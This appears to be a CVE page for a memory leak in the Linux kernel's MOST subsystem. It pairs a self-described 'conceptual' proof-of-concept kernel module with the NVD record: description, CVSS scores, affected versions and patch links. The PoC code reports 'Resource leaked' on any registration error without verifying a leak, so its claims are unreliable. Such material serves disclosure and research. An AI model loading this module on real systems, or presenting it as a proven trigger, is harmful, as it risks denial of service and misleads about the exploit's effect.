CVE-2026-43317

/* * PoC for CVE-2026-43317 (Conceptual) * This module attempts to trigger the registration failure path * in the MOST core subsystem to demonstrate resource leak. * Compile with: make -C /lib/modules/$(uname -r)/build M=$(pwd) modules */ #include <linux/module.h> #include <linux/init.h> #include <linux/most.h> // Dummy interface operations to trigger registration logic static struct most_interface dummy_interface = { .description = "PoC Interface", // Minimal initialization required to hit the specific error path }; static int __init poc_init(void) { int ret; // Attempt to register the interface // The goal is to hit the early registration failure condition // where resources are allocated but not freed upon error. pr_info("CVE-2026-43317 PoC: Triggering most_register_interface...\n"); // Simulate conditions leading to the first error path in registration // (Actual trigger depends on internal state checks of the subsystem) ret = most_register_interface(&dummy_interface); if (ret) { pr_info("CVE-2026-43317 PoC: Registration failed as expected (error: %d). Resource leaked.\n", ret); return 0; // Keep module loaded to observe leak } pr_info("CVE-2026-43317 PoC: Registration succeeded unexpectedly.\n"); return 0; } static void __exit poc_exit(void) { pr_info("CVE-2026-43317 PoC: Exiting.\n"); } module_init(poc_init); module_exit(poc_exit); MODULE_LICENSE("GPL"); MODULE_AUTHOR("Security Analyst"); MODULE_DESCRIPTION("PoC for CVE-2026-43317 Resource Leak");

{"cve": {"id": "CVE-2026-43317", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-08T14:16:40.243", "lastModified": "2026-05-15T18:25:00.913", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmost: core: fix leak on early registration failure\n\nA recent commit fixed a resource leak on early registration failures but\nfor some reason left out the first error path which still leaks the\nresources associated with the interface.\n\nFix up also the first error path so that the interface is always\nreleased on errors."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.6", "versionEndExcluding": "6.12.75", "matchCriteriaId": "168F1117-B247-4CC5-B097-132EE9E96FDD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13", "versionEndExcluding": "6.18.16", "matchCriteriaId": "B4B8CDA9-BADF-4CF5-8B3B-702DE8EEA40B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19", "versionEndExcluding": "6.19.6", "matchCriteriaId": "373EEEDA-FAA1-4FB4-B6ED-DB4DD99DBE67"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/2c198c272f9c9213b0fdf6b4a879f445c574f416", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5fd4396c2e48e90cc2597a86c18227d56ea845f0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/bbfe49ffb892bddf32c34bea95b7ff0fc30affb5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f1ba620f9e8d7291f80c0554e4b820f5fb30e819", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}